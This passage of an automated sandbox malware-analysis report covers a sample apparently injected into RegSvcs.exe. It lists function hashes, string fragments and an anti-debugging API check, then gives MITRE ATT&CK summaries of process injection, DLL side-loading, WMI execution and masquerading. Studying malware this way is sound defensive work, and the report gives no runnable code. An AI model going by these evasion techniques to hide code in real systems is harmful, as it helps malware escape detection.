COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00E57F3F

Memory Dump Source

Source File: 00000002.00000002.4134463929.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_RegSvcs.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: b2be7bd12d300dd6ac1a06a09d17bc0439862121b41bb1f356a3e20818766492
Instruction ID: ccdac7e9637a97aca20129028b246cd77ec2929e1921876dfbfe837cc5f49616
Opcode Fuzzy Hash: b2be7bd12d300dd6ac1a06a09d17bc0439862121b41bb1f356a3e20818766492
Instruction Fuzzy Hash: FB214AB19002598FCB10CFA9D4847EEBBF4AF49310F14846AE455B7351D7789945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 06707DC9 Relevance: 1.4, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06707F05

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: XPcq
API String ID: 0-714321711
Opcode ID: 1f115118b575534d1b1d6c40b92aaedcbfffce00443cbec01385da914e886a2e
Instruction ID: 93c173dccba32068f0f3e3e71e1426f91d9e7c02806ccc632c3a8010e0cca78c
Opcode Fuzzy Hash: 1f115118b575534d1b1d6c40b92aaedcbfffce00443cbec01385da914e886a2e
Instruction Fuzzy Hash: 52418374B002089FEB45DFB4C8547AEBBF6BF88700F20852AE505EB395DA709C459BA1

Uniqueness

Uniqueness Score: -1.00%

Function 06705855 Relevance: 1.4, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 067059A3

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: d4d987417d2d04c7267f1a4735acd37828d1255b69da78188d7942ee3db8373f
Instruction ID: 0b9a17dbcaafbacefa04c1d93d53a8a12e91a6d21541e18f9d18fb219ed1942b
Opcode Fuzzy Hash: d4d987417d2d04c7267f1a4735acd37828d1255b69da78188d7942ee3db8373f
Instruction Fuzzy Hash: 6831EE70B10205CFFB49AB30D65426EBBE3ABC9220F24856AD406DB3D5DE35CD46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06705868 Relevance: 1.4, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 067059A3

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 80aca0a30a84116853acda888df8d3728ca3601315f604dcf628a17389fd0a74
Instruction ID: 9e2bc3d49398266c19831a77db61f9c0b257aa47897c2e51a7d33da7f9cf1cef
Opcode Fuzzy Hash: 80aca0a30a84116853acda888df8d3728ca3601315f604dcf628a17389fd0a74
Instruction Fuzzy Hash: EE31DE70B10205CFFB59AB34D65426EBAE3ABC9210F208529D406DB3D5EE35DD46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0670A358 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f0556d8c73f7f875a4c9d933d3281ba024426d5e387f3c0bf047eb8c608868
Instruction ID: 797bb6062d1aa9211ab338e8fd530de6c7821038e29089c5eb1345d155cbca59
Opcode Fuzzy Hash: c3f0556d8c73f7f875a4c9d933d3281ba024426d5e387f3c0bf047eb8c608868
Instruction Fuzzy Hash: 19A18E34A00304CFDB64DB68D648A6DB7F2FF84314F558569E41A9B392EB31EC85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06707510 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e4f95fe7fa997f743cacad6b9122ec6169ae6d0c21bcc7b1ce9e6028cf6db0
Instruction ID: be8e170b262d6cf9f4e5afd62cfa3f51236f39d0dc4fb9046df926db204a5bb8
Opcode Fuzzy Hash: b6e4f95fe7fa997f743cacad6b9122ec6169ae6d0c21bcc7b1ce9e6028cf6db0
Instruction Fuzzy Hash: 65814034B102099FDF48DB78D5546AE77F7AF89304F108429D40ADB395EB30EC8687A1

Uniqueness

Uniqueness Score: -1.00%

Function 06709428 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b309e051f871f26a4a983663ff57fb79372cba3e1397b12b0944047d9938bc
Instruction ID: 9632800826e7d339ffc19796cbd1391b238f29299d2e152ddb63f1559ec95946
Opcode Fuzzy Hash: 19b309e051f871f26a4a983663ff57fb79372cba3e1397b12b0944047d9938bc
Instruction Fuzzy Hash: 3861E171F000214FDF509A7EC88466FEADBAFC4624B15403AE90EDB365DEA6DD0287D2

Uniqueness

Uniqueness Score: -1.00%

Function 0670782C Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb2c079c36798a2d822181679ab95ca3e23e6abead2ac276bf6bcb3290ba05b
Instruction ID: 55c04be1152213b5c63a2153d34839412dbb8fdc0227c1080243237bb934bbf5
Opcode Fuzzy Hash: 8bb2c079c36798a2d822181679ab95ca3e23e6abead2ac276bf6bcb3290ba05b
Instruction Fuzzy Hash: BE915E34E10219CFDF64DF68C880B9DB7B1FF85310F208699D449AB295EB70AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06707840 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2520122e648b3a70bf1f6ba76f133b80c699f30e78f89cd6c7956d8459f3d8d2
Instruction ID: 0ced88cf115ff8383bb6f7d28eec6e21c207624797ce3d276b0563ee5128089d
Opcode Fuzzy Hash: 2520122e648b3a70bf1f6ba76f133b80c699f30e78f89cd6c7956d8459f3d8d2
Instruction Fuzzy Hash: 2B912E34E10619CBDF64DF68C880B9DB7B1FF89300F208599D549AB295EB70AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06708680 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d27eb6108543f2051a22c0d30ad8bd24dc892a5fad9083cf4a5c8cb6a1178be9
Instruction ID: 0a3335bf8402cc6246971455b999cdf920f50287eabbb545c0c83cb7ba3f3221
Opcode Fuzzy Hash: d27eb6108543f2051a22c0d30ad8bd24dc892a5fad9083cf4a5c8cb6a1178be9
Instruction Fuzzy Hash: F8417475F00605DFEF60CEA9D880ABFF7F5EB45310F10492AE216D7695D730A8458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0670571B Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dce4df31374ab0689a6571565c0c17ff43c645ff991bbbbd24b630c10e9efd9
Instruction ID: fa6d2699c7dd839b7988dd0afe9fab5fc1e9cb58c8cb0c75381e987f90f24d09
Opcode Fuzzy Hash: 6dce4df31374ab0689a6571565c0c17ff43c645ff991bbbbd24b630c10e9efd9
Instruction Fuzzy Hash: 2A314F34E10205DFEB59CBA4D9546AEB7F6AF89314F10C529E806A7790DB70AC46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 06705728 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66864c3da0faa4587d552a354ae919c1836a14f97f8884474e6dcc49b46fbf3e
Instruction ID: d2f3e6777d0c8141f2e87282631acc907cbce28958d5ce047735af2d0a84d160
Opcode Fuzzy Hash: 66864c3da0faa4587d552a354ae919c1836a14f97f8884474e6dcc49b46fbf3e
Instruction Fuzzy Hash: 40313934E10605DBEB55CFA4D5946AEB7F6AF89300F10C529E80AAB390DB70A846CF60

Uniqueness

Uniqueness Score: -1.00%

Function 06707118 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f63b18d03bf0fd8c862bea3fa247bd44755255128af28007a8e61e1777aef688
Instruction ID: 4bc316ee5265dfa4cf091d10fe0c534fbea1da4d1047d92adab71d51f351947e
Opcode Fuzzy Hash: f63b18d03bf0fd8c862bea3fa247bd44755255128af28007a8e61e1777aef688
Instruction Fuzzy Hash: CA219171F00215DFDB04DF78ED90AAEBBF5AB88614F10806AE904E7390E631E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0670D948 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0941ab49b3467a88ab46243bdbf8ef2bf1ff601a6b6236e71dbf50739c04871e
Instruction ID: 72198cf2d152a02d04c3357da138ad611e5c14961fc24074b2ed94f1aeb35c0b
Opcode Fuzzy Hash: 0941ab49b3467a88ab46243bdbf8ef2bf1ff601a6b6236e71dbf50739c04871e
Instruction Fuzzy Hash: F121C530B102058FEB60DAB8E96077EB3D6DF86714F104436E54ECB3C9EA21DC0287A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C6D005 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4134156229.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c6d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ee750addc914871eea50d7ac61303f4d26c99398fec40faa3b358d58f35e7d
Instruction ID: 0aa0ff39e7149650713de122af585d43e52e9ebcd1d8c371670c13e153378296
Opcode Fuzzy Hash: 81ee750addc914871eea50d7ac61303f4d26c99398fec40faa3b358d58f35e7d
Instruction Fuzzy Hash: 63314B7550D3C49FCB13CF24D990715BF71AB56214F29C5EBD9898F2A3C23A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 06707128 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ae45d54e9dc61c4175b3b32f58de732604c552433644c125d6952619781d070
Instruction ID: b6262a09c734bb7dfcee6b595703c531923c25d57bff3097557c9c7d0b4403fe
Opcode Fuzzy Hash: 3ae45d54e9dc61c4175b3b32f58de732604c552433644c125d6952619781d070
Instruction Fuzzy Hash: 20219175F01215DFEB44DF79DA80AAEB7F5EB88600F108026E905E7390E730E9018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0670A348 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 098ea944f16eca0075c9755814b41a816e11821a52c38dddd3bdf8bd2fc5ec3e
Instruction ID: 3940093c7779e7cac15381ea57235afc38eca6f6be6483c9cacd597445dcdf81
Opcode Fuzzy Hash: 098ea944f16eca0075c9755814b41a816e11821a52c38dddd3bdf8bd2fc5ec3e
Instruction Fuzzy Hash: 7421D130B10214DFEF94DB78E5546AEBBF6EBC8324F148529D405EB382DB319C428BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C6D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4134156229.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c6d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 498f81c25890436d13cf89c9849d605a10c545eba4f37c59d67f67d9b10261bf
Instruction ID: bd759e991551af557a7997049cc7f0090a5b5ceba27343ee731f05717829c024
Opcode Fuzzy Hash: 498f81c25890436d13cf89c9849d605a10c545eba4f37c59d67f67d9b10261bf
Instruction Fuzzy Hash: DD210471A04204DFCB24DF14DAC0B26BBA5FB84314F34C56DD80A4B296C77BD847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 06707228 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06df99f46912d9736c3afa8fac87290c383b09833c8be68d40ac66377f4f035b
Instruction ID: 28e4ff750afc648b969e86609f43607d61cd4bae619e6fb7c8e67a6788f56488
Opcode Fuzzy Hash: 06df99f46912d9736c3afa8fac87290c383b09833c8be68d40ac66377f4f035b
Instruction Fuzzy Hash: 06018436B10015AFEB5896A8EC516EF77FED7C4614F50403AE50AD7284DE61A80287E2

Uniqueness

Uniqueness Score: -1.00%

Function 06707238 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba7f7c4a5959c96e298b6bd556e2598c8b1000e441083e90eb1142fd91388ff
Instruction ID: be8cf4099bd46ef5333785aed7ad8fa30ee7e3f04b5af646620df10a1b01c45f
Opcode Fuzzy Hash: 6ba7f7c4a5959c96e298b6bd556e2598c8b1000e441083e90eb1142fd91388ff
Instruction Fuzzy Hash: AE116131F101259FEF58D678D8546AE73FAABC8614B11853AD50AE7384DE34EC068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 06707471 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1cadd32dcb8bf218ab8542fed67d481609a3287bf08b33b3b642bae819df6d0
Instruction ID: 7b5f508f76b261f864e6034cbd84b07b1a567e69eed8216d9690f1b23b684c49
Opcode Fuzzy Hash: e1cadd32dcb8bf218ab8542fed67d481609a3287bf08b33b3b642bae819df6d0
Instruction Fuzzy Hash: 9201B130B001506FEB99956CA45473FABD7DBCA324F24843AF10ECB395E965EC4243B6

Uniqueness

Uniqueness Score: -1.00%

Function 06706EF1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 442976cff2e37cc5f16518f831e7337d5da65c2089953aa3b1ae8d40eaebca80
Instruction ID: 02aa32f4b35c283f26e6af0436b68bc09fdf72a7dc8918a0dc09e187684544f5
Opcode Fuzzy Hash: 442976cff2e37cc5f16518f831e7337d5da65c2089953aa3b1ae8d40eaebca80
Instruction Fuzzy Hash: 8721EFB5901259EFCB10CF9AD884BCEFBF8BB48314F10816AE918A7240C375A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06706EF8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ddec319a5d38c086aea839454c4c0ceaa13a724ff90299fe08dd56c5c2df1b8
Instruction ID: 74f3b886dc549de49df70677e803bb3aba0c56f10f4afdea6cecd39c1cea38f2
Opcode Fuzzy Hash: 1ddec319a5d38c086aea839454c4c0ceaa13a724ff90299fe08dd56c5c2df1b8
Instruction Fuzzy Hash: 4B11B3B5D01259DFCB10DF9AD884ADEFBF8FB48314F10812AE518A7250C374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06707480 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd37d82b4968f19d91550cb0764f3ba26f79629229697f7031faf5b3784813ff
Instruction ID: 25b58cb82a287e78309473e87919bc3dd63ed5cfb5c4b2c530e954efc1c7bf79
Opcode Fuzzy Hash: fd37d82b4968f19d91550cb0764f3ba26f79629229697f7031faf5b3784813ff
Instruction Fuzzy Hash: 94018131B001145BEB68956DA550B2FB6DBDBCA724F20843AF10EC7395ED65EC4243F5

Uniqueness

Uniqueness Score: -1.00%

Function 0670D958 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45f7d31a1f033c5c5e35fdf7e130a6b66d834794b5d8e73766dbb7b4bb8c729e
Instruction ID: d504f2d1bd3c67276ea34a7d24689a005bb87d365c73fdc09d26a226955ddb65
Opcode Fuzzy Hash: 45f7d31a1f033c5c5e35fdf7e130a6b66d834794b5d8e73766dbb7b4bb8c729e
Instruction Fuzzy Hash: DE018630B101144BEB60E67CE56072AB3DADB89714F508429E50EC7388D921DC0287A5

Uniqueness

Uniqueness Score: -1.00%

Function 067096AB Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c142a795ad3d04c22ff4c3540e2ba91225fe08d0738d659f480b760c1fc620
Instruction ID: 5328a028b83e800be7ccfaf5c139b27c5f6f2619796e61a6778136591d8da872
Opcode Fuzzy Hash: 80c142a795ad3d04c22ff4c3540e2ba91225fe08d0738d659f480b760c1fc620
Instruction Fuzzy Hash: 3AE09B71D19248DBEB10DA70890566A7BACD702204F2084E6E504CB183F576CD4583B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0670ACE0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 0670B199
$^q, xrefs: 0670AE01
$^q, xrefs: 0670ADDC
$^q, xrefs: 0670B238
$^q, xrefs: 0670B24E
$^q, xrefs: 0670ADD0
$^q, xrefs: 0670B242
$^q, xrefs: 0670B18D
$^q, xrefs: 0670B22C
$^q, xrefs: 0670AE0D

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 1419c30652f1430190e5525e8b00a42a8cd0fb3488a4eff6697ef5249ebdb332
Instruction ID: 0dccbceb3038766a0ba4a5c8f6b2f5dd019036977887f49a192ac9fe3d5370d3
Opcode Fuzzy Hash: 1419c30652f1430190e5525e8b00a42a8cd0fb3488a4eff6697ef5249ebdb332
Instruction Fuzzy Hash: 57124C30E00219CFDB68DF65C954AADB7F2BF88704F208969D409AB3A5DB319D85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0670DF78 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 0670E0D5
$^q, xrefs: 0670E0C9
$^q, xrefs: 0670E06E
$^q, xrefs: 0670E07A
$^q, xrefs: 0670E12A
$^q, xrefs: 0670E136
$^q, xrefs: 0670E100
$^q, xrefs: 0670E0F4

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: ea16795b20dbcf85ae36d8a75e0aee6be613daa564ec3aac1b7a68725305c7d3
Instruction ID: e5d72721d85d8009dc483e7796dd7419f0b613148030db06bdd96a65fd8c62b5
Opcode Fuzzy Hash: ea16795b20dbcf85ae36d8a75e0aee6be613daa564ec3aac1b7a68725305c7d3
Instruction Fuzzy Hash: 0E918130E10209DFEB68DF64DA54B6EB7F2BF84304F208829E4019B3D5DB759945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0670A6E0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 0670ABF4
.5vq, xrefs: 0670A73B
$^q, xrefs: 0670ABE8
$^q, xrefs: 0670AA1C
$^q, xrefs: 0670AA28
$^q, xrefs: 0670AB7C
$^q, xrefs: 0670A9C2

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 6731159d4e94f2ca4a0459f38a62ac2762afc6a6f656f95cdb805e5df2c908a4
Instruction ID: 3c541a82b498e672a04345e8dad804749856ed0216b44d31267538910beeac50
Opcode Fuzzy Hash: 6731159d4e94f2ca4a0459f38a62ac2762afc6a6f656f95cdb805e5df2c908a4
Instruction Fuzzy Hash: A2F14F34A00308CFDB59EF64D654A6EBBF2BF84305F108529E4059B7AADB35DC86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0670BA18 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 0670BC7E
$^q, xrefs: 0670BCD7
$^q, xrefs: 0670BCE3
$^q, xrefs: 0670BC72

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: e4d39e497331d117f4cdd5aaa4fdd4b0b4506c1c7e274f9568e27fd81f999e80
Instruction ID: f670511c851fbf5353e34a628a6ace75b09276eda71cc13072fd8fc1cac1f199
Opcode Fuzzy Hash: e4d39e497331d117f4cdd5aaa4fdd4b0b4506c1c7e274f9568e27fd81f999e80
Instruction Fuzzy Hash: 80B16C30A00208CFEB54EB68D99466EB7F2EF84705F248829E405AB795DF75DD86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0670BE30 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 0670BEBB
LR^q, xrefs: 0670BF72
$^q, xrefs: 0670BEAF
LR^q, xrefs: 0670BF23

Memory Dump Source

Source File: 00000002.00000002.4143522044.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: b7aa7a6013fb99ba1aa8732c857acf329d98f2d5079586dc150cd15319c775c6
Instruction ID: 2bded4f4137f473800a3ce44a0c61bbb3b00e1804093fc6767f15ceef82165e5
Opcode Fuzzy Hash: b7aa7a6013fb99ba1aa8732c857acf329d98f2d5079586dc150cd15319c775c6
Instruction Fuzzy Hash: 8651D530B00205CFEB54DB28DA40A6EB7E6FF84704F108569E5059F3A5DB31ED45CBA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
